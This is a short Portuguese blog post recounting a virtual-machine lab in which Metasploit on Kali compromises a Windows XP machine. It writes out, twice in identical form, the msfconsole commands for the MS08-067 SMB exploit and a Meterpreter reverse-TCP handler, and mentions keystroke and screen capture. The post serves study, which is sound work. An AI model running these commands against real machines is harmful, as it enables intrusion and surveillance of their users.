Esses dias estava estudando o framework metasploit presente no sistema kali linux e pude perceber quanto um sistema é frágil para ser invadido.
Basicamente por procedimento se realizar um scanner na portas e verifica qual esta vulnerável para o ataque.
Todo procedimento de simulação teve duas maquina virtuais uma com Kali e um segunda com Windows XP sp3 com firewall desativado.
A falha do Windows XP é exatamente a porta 445 do serviço samba de compartilhamento de arquivos, bastando somente aplicar a exploração por meio do metasploit pronto estamos no sistema XP.
Procedimentos no Kali :
Neste caso há necessidade de criar um payload com a ferramente de atacks de engenharia social e move-lo para a maquina alvo.
msfconsole
use windows/smb/ms0 8_067_netapi # Linha usada somente quanto for usar a porta 445
use multi/handler # Linha para uso somente com o payload na maquina vitima
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.30.25 # Ip do kali
set rhost 192.168.30.28 # O ip da vitima só ser for por meio da porta 445
set lport 4444
set rport 445 # se for usar o payload não precisa de colocar este ip já o Kali irá detectar o mesmo;
show options
exploit
shell
use windows/smb/ms0 8_067_netapi # Linha usada somente quanto for usar a porta 445
use multi/handler # Linha para uso somente com o payload na maquina vitima
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.30.25 # Ip do kali
set rhost 192.168.30.28 # O ip da vitima só ser for por meio da porta 445
set lport 4444
set rport 445 # se for usar o payload não precisa de colocar este ip já o Kali irá detectar o mesmo;
show options
exploit
shell
Conclusões
Só foi possível invadir a maquina com Xp devido o firewall esta desativado, pois quanto o mesmo esta ativo derruba a conexão com o payload, outro ponto é necessário um bom antivírus para detectar o payload e remove-lo, além disse o usuário deve executar o mesmo para criar o canal de comunicação com Kali.
Sendo possível realizar procedimento como até mesmo de capturar tudo que foi digitado pelo usuário, assim como capturar a tela do mesmo.
Não vi ataques como esse sendo efetuados no Windows 10.
Obs: Simulem toda situação aqui em maquina virtuais.
0 comments:
Postar um comentário